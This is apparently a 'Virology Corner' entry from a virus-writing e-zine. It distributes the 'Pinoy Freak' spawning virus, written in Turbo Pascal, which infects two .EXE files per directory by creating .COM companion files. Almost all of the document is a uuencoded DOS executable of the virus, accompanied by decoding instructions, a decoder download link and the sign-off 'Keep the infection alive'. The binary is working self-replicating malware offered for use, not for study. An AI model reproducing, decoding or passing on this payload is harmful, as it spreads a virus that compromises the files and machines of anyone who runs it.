[ Virology Corner ] ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

þ Virus Name : Pinoy Freak virus
þ Size :
þ Notes : Spawning run-time virus made in Turbo Pascal 7.0 . Infects 2 .EXE files
in the current directory . Spawns the host file with it's .Com companion file.
this is made for the PVW issue no. 2 .
Author : Zoom23


Use UUdecode.com to convert it to an executable :

================== cut here ================

begin 644 pfreak.exe
M35I@``P`,@`/`'(&<@:N`:9A``!(`@``'````",````S````/0```$L```"9
M````J````+<```"\````U````.,```#H````"0$``"(!```M`0``.`$``$<!
M``!6`0``@0$``*4!``"U`0``OP$``,P!``!+`@``4`(``&H"``"1`@``I0(`
M`*\"``#2`@``XP(``.@"``#R`@````,``!@#```B`P``+`,``#8#``!``P``
M"0`U`"0`-0`W`#4`.P$U`*$!EP`!`+,`&P&S`!`#LP`L";,`1PFS`%T)LP!\
M";,`````````````````!"Y#3TU5B>6![``!OVX`'E>_^@(>5[\^`QY7OT@#
M'E>:O@"7`(V^`/\65[\^`QY7FN`&LP"_```.5YI?![,`N#\`4+]\`!Y7FD(`
MEP"#/F(#`+``=0%`HJ<`B>Q=PU6)Y8'L8AF,TX[#C-O\C;X`_\5V"*RJD3#M
M\Z2-O@#^Q78$K*J1,.WSI([;C;Z`_197C;X`_Q97FIH$LP"-OH#]%E>X(`!0
MFB0`EP"-OH#]%E>X`0!0FM4$LP":B@*S``G`=`/IDP"-O@#]%E>-O@#^%E>:
MF@2S`(V^`/T65[@!`%":W@2S`)J*`K,`"<!T`NMHC;Z`_197C;Z>YA97N&`6
M4(V^_OP65YK`!;,`C;X`_197C;Z>YA97N&`64#'`4%":QP6S`(V^@/T65YI6
M!;,`C;X`_197FE8%LP"-OH#]%E>X`P!0FB0`EP"-O@#]%E>X`P!0FB0`EP")
M[%W""``%*BY%6$4$+D-/356)Y8'L``*_7@$.5[@_`%"_4``>5YI"`)<`@SYB
M`P!U1L8&IP``Z'/^@#ZG``!U*XV^`/\65S'`4)I8!K,`C;X`_A97OSX#'E>:
MX`:S`+]D`0Y7FE\'LP#HFOZ_4``>5YJ``)<`Z[.)[%W#58GE@^P&Q'X$)HH%
MB$;]BD;]B$;[L`$Z1OMW-8A&_NL#_D;^BD;^,.3$?@0#^":*!3#D+3X`B$;_
MBE;_BD;^,.3$?@0#^":(%8I&_CI&^W70B>Q=P@0`%8ZGK*VW7H2PHY^I7UYK
M7A\SE(%+2`$@!"Y%6$6:``"S`)H-`#4`58GE@>P"`K\K`@Y7OZH!'E>X_P!0
MFOH&LP"_J@$>5^A@_[1`NP$`C1:J`;D6`,TAZ.3^C;X`_Q97,<!0FE@&LP"_
M^@(>5[\^`QY7OT@#'E>:O@"7`,8&J@``FJ<&LP"(1O^P`3I&_W=/HJ@`ZP3^
M!J@`C;[^_197OZH`'E>:X`:S`(V^_OX65Z"H`##D4)I8!K,`FE\'LP"_00(.
M5YI?![,`OZH`'E>X_P!0FOH&LP"@J``Z1O]UMHV^`/\65[_Z`AY7FN`&LP"_
M/@,>5YI?![,`OT,"#E>:7P>S`+^J`!Y7FB(!EP")[%TQP)H6`;,`````````
M``````````!5B>6X_P":%@&S`%W#58GEZ"@`OV@#'E<.Z"`#OV@#'E>:9`.S
M`+]H!!Y7#N@-`[]H!!Y7FFD#LP!=R[0/Z-0%/`=T"CP#=@:X`P#H50#HGP"T
M"#+_Z+P%BL0D?Z)>`Z)4`S/`HD\#HE\#HF`#0*).`XX&1`"_;``FBATF.AUT
M^R:*';CD_YGH/`+WT/?2N3<`]_&C6@,>#A^Z.`&X&R7-(1_#C@9$`":`)H<`
M_CP'=`8\!'("L`-0M`#H5P58"N1T+;@2$;,`Z$H%N#`1MP"R`.A`!8#Z*G46
M)H`.AP`!N``!N0`&Z"P%M!*S(.@E!<.T#^@?!5"X,!&W`+(`Z!0%6+$`"M)U
M"+(8/`-W`K$!BO**U/[*M`"`_AAV`K0!HU(#B19<`X@.40/&!E`#`3/`HU8#
MB198`\-0'KA2`8[8@#Y.`P!T!<8&8`,!'UC/@#Y@`P!U`</&!F`#`+0!S19T
M!K0`S1;K]+!>Z!T#L$/H&`/H#@/IB?Z+W#:+1P3H(__H;?^@7@.B5`/*`@"+
MW#:*5PHVBG<(-HI/!C:*;P0ZT7<G.O5W(_[*>!_^SG@;_LDZ#EP#=Q/^S3HN
M70-W"XD65@.)#E@#Z$$#R@@`N``&BCY4`XL.5@.+%E@#Z#8$BQ96`^@E`\OH
M&@.X``:*/E0#B\J*%E@#Z!L$R[@!!^L#N`$&4.C]`EB*/E0#B@Y6`XKNBQ98
M`SKN=0(RP.CV`\N+W#:*5P8VBG<$_LH"%E8#<A<Z%E@#=Q'^S@(V5P-R"3HV
M60-W`^C"`LH$`.BU`HK"*@96`_[`R^BI`HK&*@97`_[`RXO<-HI'!*CP=`0D
M#PR`@"94`W`(!E0#R@(`B]PVBD<$)`>Q!-+@@"94`X\(!E0#R@(`@"94`_?+
M@`Y4`PC+H%X#HE0#RXO<-HM/!.,3C@9$`#/_)HH=H5H#,]+H!0#B]LH"`"T!
M`(/:`'(%)CH==//#B]PVBU\$N-TTNA(`.]-S&O?SB]CD8:@#=0@,`^9AL+;F
M0XK#YD**Q^9"R@(`Y&$D_.9ARX`^7P,`=0BT`<T6L`!T`K`!RZ!?`\8&7P,`
M"L!U$C+DS18*P'4*B"9?`PKD=0*P`^@3_LN+W!XVQ7\$QT4"L-?'102``(V%
M@`")10R,70['11!G`XQ-$L9%,``?R@0`B]P>-L5_!+B?`[M]!(O+@7T"L==T
M"L=%`K+7N$P$B]B)112,31:)71B,31J)31R,31XSP!_*!`!5B^S$?@8FBU4$
M2DHFBW4()L1]##/;Q@9?`P`.Z%S_N0$`/`AT-#P3=#`\!'1$23P;="<\`70C
M/`9T-SP:=$8\#71//"!RSSO:=,LFB`%#Z)@`.]YVP(OSZ[P+VW2XL`CHAP"P
M(.B"`+`(Z'T`2^+JZZ0[WG2@)HH!/"!RF>AJ`$/B[^N1@#Y/`P!TBB:(`4/K
M"NA.`";'`0T*0T/$?@8SP":)10@FB5T*7<H$`(O<-L1_!":+30@F*4T(XQDF
MQ'T,@#Y0`P!U"R:*!>@<`$?B]^L#Z)P`Z-;\,\#*!``SP,H$`+`-Z`(`L`I3
M45(&4.AR`%@\!W0J/`AT+3P-=#,\"G0UM`F*'E0#,O^Y`0!2Z&,!6O[".A98
M`W8@BA96`^L7M`[H3P'K$SH65@-T#?[*ZPF*%E8#ZP/H"`#H+0`'6EE;P_[&
M.C99`W88_LY14K@!!HH^5`.+#E8#BQ98`^@4`5I9P[0#,O_I"@&T`C+_Z0,!
M'HX>1`"+%E``'XO:B_<FB@4\!W0A/`AT+#P*=#4\#70Y1_[".A98`W8\Z&X`
MZ*'_BA96`^LLZ&(`45*X!P[HP@!:6>L<Z%,`.A96`W03_LKK#^A&`.AY_^L'
MZ#X`BA96`T>+]XO:XJ;H,``>CAY$`(D64`"*QO8F2@`R]@/"B\B+%F,`L`[N
MZP"*Q4+NZP!*L`_NZP"*P4+N'\,[]W1C45)7'@:+SRO.'HX>1`"*Q_8F2@`R
M_P/#T>"+^(L68P"#P@:`/DD`!Q^A2@!U`Z%(`(H>40.*/E0#!A^.P/P*VW06
MK(K8[*@!=?OZ[*@!=/N+PZO[XNSK!HKGK*OB_`<?7UI9PU9750;-$`==7U[#
M`%6+[![%5@J#PC"X`$/-(1]S!#/)ZP(SP*-B`\1^!I&K7<H(`%6+[![%5@B#
MPC"+3@:X`4/-(1]R`C/`HV(#7<H&`%6+[(/L4![%=@R-?K`6!_RL/$]R`K!/
MF)'SI#+`JL56!K0:S2&-5K`6'XM."K1.S2$?Q'X&Z"``B^5=R@H`58OL'L56
M!K0:S2$?M$_-(<1^!N@$`%W*!`!R'H/''AX&'S+`N0`!_/*N]M&*P4^+]T[]
M\Z2J_!\SP*-B`\-5B^P>_,5V$JR*T#+VB]H+VW0/@'C_7'0)@'C_.G0#2W7Q
MN$,`Q'X.Z"<`,]OK!H`X+G0%0SO:=?:X"`#$?@KH$`"+VK@$`,1^!N@%`!]=
MRA``*],[PW("B\.JB\@#WO.DB_/#58OLB29D`XP69@.![/X`CAXX`*$L`(E&
M\A8'_,5V"HU^@JP\3W("L$^8D?.D,L"JQ78&C;X"_ZP\?G("L'ZJF)'SI+`-
MJA8?C;8"_XEV](Q>]D:-?N*)?OB,1OJX`2G-(8U^THE^_(Q&_K@!*<TAC5:"
MC5[RN`!+S2%R`C/`NE(!CMKZBR9D`XX69@/[HV(#7<H(`+1-S2'+``````"Z
M4@&.VHP&.``S[>C0">B@`(O$!1,`L033Z(S2`\*C"@"C#``#!@0`HPX`HQ@`
MHQP`HR0`C@8X`":A`@"C(`#'!BH`U@",#BP`OV@%OCD"N1,`D/PNK+0US2&)
M'8Q%`H/'!.+O'@X?N@P!N``ES2&Z$P&X(R7-(;K;`+@D)<TAN@0!N#\ES2$?
MN&@#'E`>4+AC`@Y0#NA.`@[HR`*X:`0>4!Y0N&,"#E`.Z#H"#NBY`LLSP)Q;
M@.</4YV<68#E\(#]\'0.0(#/\%.=G%F`Y?!T`4"B3`##,\#*`@#[@\0&6(/G
M'X''E@"`_#ES`[___U>T5,TAB^R`3A8!6%M96EY?71\'S[C0`(/$!NL#N,@`
M65OK![C_`#/),]NZ4@&.VONC,@"+P0O#=#VA$``+P'0OCL`FH1``"\!T&RO#
M=Q?WV#T`$',0NA``]^(#P7(')CL&"`!R!B:A%`#KT8O(C,,K'C@`@^L0B0XT
M`(D>-@#$'BX`C,`+PW03,\"C+@"C,`"C/`"X;@$.4`93R[AH`QY0#N@J`KAH
M!!Y0#N@A`K]H!;XY`KD3`)#\+JRT)1[%%<TA'X/'!.+PH30`"P8V`'0INTP"
MZ"H`H3(`Z#(`NUL"Z!X`H38`Z$``L#KH50"A-`#H-0"[8`+H!P"A,@"T3,TA
M+HH'"L!T!N@X`$/K\\.Q9.@'`+$*Z`(`ZP0RY/;Q!#!0Z!X`6(K$PU"*Q.@!
M`%A0L032Z.@#`%@D#P0P/#IR`@0'BM"T!LTAPP`"&R$C)#0U-C<X.3H[/#T^
M/W52=6YT:6UE(&5R<F]R(``@870@`"X-"@!0;W)T:6]N<R!#;W!Y<FEG:'0@
M*&,I(#$Y.#,L.3(@0F]R;&%N9#/`AP8\`,N#/CP``'4!RZ$\`.EP_HOT-HY$
M`B8[50)_!WP4)CL%<@\F.U4&?`A_!R8[101W`<NXR0#I2/ZXUP#I0OX%``)R
M#2O$<PGWV#L&.@!R`<NXR@#I*OZZ,]*+W!XVQ'\(-L5W!/PSP*NXL->KN(``
MJS/`JZNKC45TJXS`J[CW"*NXLP"K,\"Y#@#SJ[E/``O2=0FL.LAV!(K(XPBL
M"L!T`ZKB^#+`JA_*"`"+W#;$?PHVBT<$)HE%!#:+1P8FB44,-HM'"":)10XS
MP":)10@FB44*R@H`NK'7ZPBZLM?K`[JSUU6+[,1^!B:+10(]L==T$CVRUW0-
M/;#7=!#'!CP`9@#K)%(&5P[H)0!:,\`FB54")HE%"":)10J[$`#H3`!T!B;'
M10*PUUW*!`"P`.L"L`%5B^S$?@8F@7T"L==T&":!?0*RUW0(QP8\`&<`ZQA0
MNQ0`Z!4`6`K`=`R['`#H"@`FQT4"L-==R@0`!E<&5R;_&0O`=`.C/`!?!\.+
MW!XVQ'\$)L55#":+300FBQVT/\TA<A`FB44*,\`FQT4(```?R@0`)L=%"@``
MZ^Z+W!XVQ'\$)L55##/))H=-"":+';1`S2%R!RO!=`.X90`?R@0`B]P>-L1_
M!";%50PSR2:'30@FBQVT0,TA<@(SP!_*!`"+W#;$?P0FBQV#^P1V!K0^S2%R
M`C/`R@0`NC/2B]P>-L1_"#;%=P3\,\"KN+#7JS/`N18`\ZNY3P`+TG4)K#K(
M=@2*R.,(K`K`=`.JXO@RP*H?R@@`H$X`M#TSTNL&N``\N@$`58OLQ'X()H%]
M`K#7=!HF@7T"L]=T",<&/`!F`.LT4%(&5P[H3`!:6":`?3``=!(>C54P!A\S
MR<TA'W,&HSP`ZQ&2)L=%`K/7)HD%BT8&)HE%!%W*!@"+W#;$?P3H.`!U#C/)
M)HL=M$#-(7,#HSP`R@0`B]PVQ'\$Z!P`=1<FBQV#^P1V";0^S2%S`Z,\`";'
M10*PU\H$`":!?0*SUW0&QP8\`&<`P[0_NF0`ZP6T0+IE`%6+[,1^"NC<_W4;
M'E+%5@8FBTT$)HL=S2%:'W(&.\%T!8O"HSP`7<H$`+,_N60`ZP6S0+EE`%6+
M[,1^$.BF_W4_BT8*"\!T'!Y1)O=E!(O(Q58,BN,FBQW-(5D?<A\STB;W=03$
M?@:,P@O7=`4FB07K'#M&"G07B0X\`.L1HSP`Q'X&C,(+UW0%,\`FB05=R@X`
M58OLQ'X*Z$K_=2&+1@@F]V4$B\B+1@8F]V4$`\J+T":+';@`0LTA<P.C/`!=
MR@@`58OLBU8&"])T!>A)`.LPM##-(3P#N```<B6.!C@`)HX&+``S__PF.@5T
M![G___*NZ_2#QP.+][D``?*ND?;0'@8?Q'X(_*J1\Z0?7<H"`#/2Z`(`D\N.
M!C@`OX``)HH-,NU',]OC"2:`/2!W`T?B]XOWXPDF@#T@=@-'XO>+QRO&=`1#
M2G7>P_R+W(S:-L1_"#;%=P2LJHK(,NWSI([:R@0`_(O<C-HVQ7<*-L1_!C:+
M3P2L.L%V`HK!JHK(,NWSI([:R@H`_(O<C-HVQ'\,-L5W"(H$,N0VBT\&"\E_
M`[D!``/Q*\%R$T`VBT\$"\E]`C/).\%V!HO!ZP(SP*J+R/.DCMK*"`#\B]R,
MVC;$?P@VQ7<$)HH-,NVL)@`%<P@FQ@7_BL'VT`/Y1XK(\Z2.VLH$`%6+[![%
M=@K\K`K`="R*T#+VQ'X&)HH-,NTKRG(<04>L\JYU%8O'B]F+RDGSIG0.B_B+
MRXMV"D;KYC/`ZP1(*T8&'UW*"`#\B]R,VC;%=P@VQ'\$K":*)4>*R#K,=@**
MS`K)=`8R[?.F=0(ZQ([:R@@`_(O<-L1_!K`!JC:*1P2JR@(`_(O<C-HVQ'\*
M-L5W!C:+1P2JB\CSI([:R@8`58OL@>P``H-^!@%]!<=&!@$`C;X`_Q97Q'X*
M!E>X`0!0BT8&2%`.Z,O^Q'X.!E<.Z`/_C;X`_A97Q'X*!E?_=@:X_P!0#NBL
M_@[HZ?[$?@H&5_]V"`[H>/Z+Y5W*#`!5B^R![``"@WX&`'Y<@WX(`'Y6@7X(
M_P!_3X%^!O\`?@7'1@;_`(V^`/\65\1^"@97N`$`4(M&"$A0#NA8_HV^`/X6
M5\1^"@97BT8(`T8&4+C_`%`.Z#[^#NA[_L1^"@97N/\`4`[H"?Z+Y5W*"`"+
MW!XVQ7\$,\F)#;@`/8%]`K'7=`VP`O\%@7T"L]=T`K0\@'TP`'0)C54PS2%R
M6HD%N`L$NK,`,\DSVX%]`K'7="^+';@`1,TA]L*`N&`$NK,`B\B+VG44@7T"
ML]=U`^@K`+@[!+JS`#/),]O'10*RUXE%%(E5%HE-&(E=&L=%'(`$QT4>LP`S
MP!_*!``STC/)BQVX`D+-(2V``(/:`',$,\`STHO*B]"+';@`0LTAC96``+F`
M`(L=M#_-(7,",\`SVSO8=""`N8``&G0#0^ORB],KT+G__XL=N`)"S2$SR8L=
MM$#-(<._4``>![FT!2O/T>DSP/SSJ\,``````````````````````````/__
M````````````````````````````````````````````````````````````
-$$```*``L`"X```"````
`
end
======================== end here ======================

If you have trouble in coverting this download UUdecode.com at :

  http://members.xoom.com/Zoom23/uudecode.com  (Mirror site )

use the mirror site it's much faster .



" Keep the infection alive ...."

                                      - Zoom23

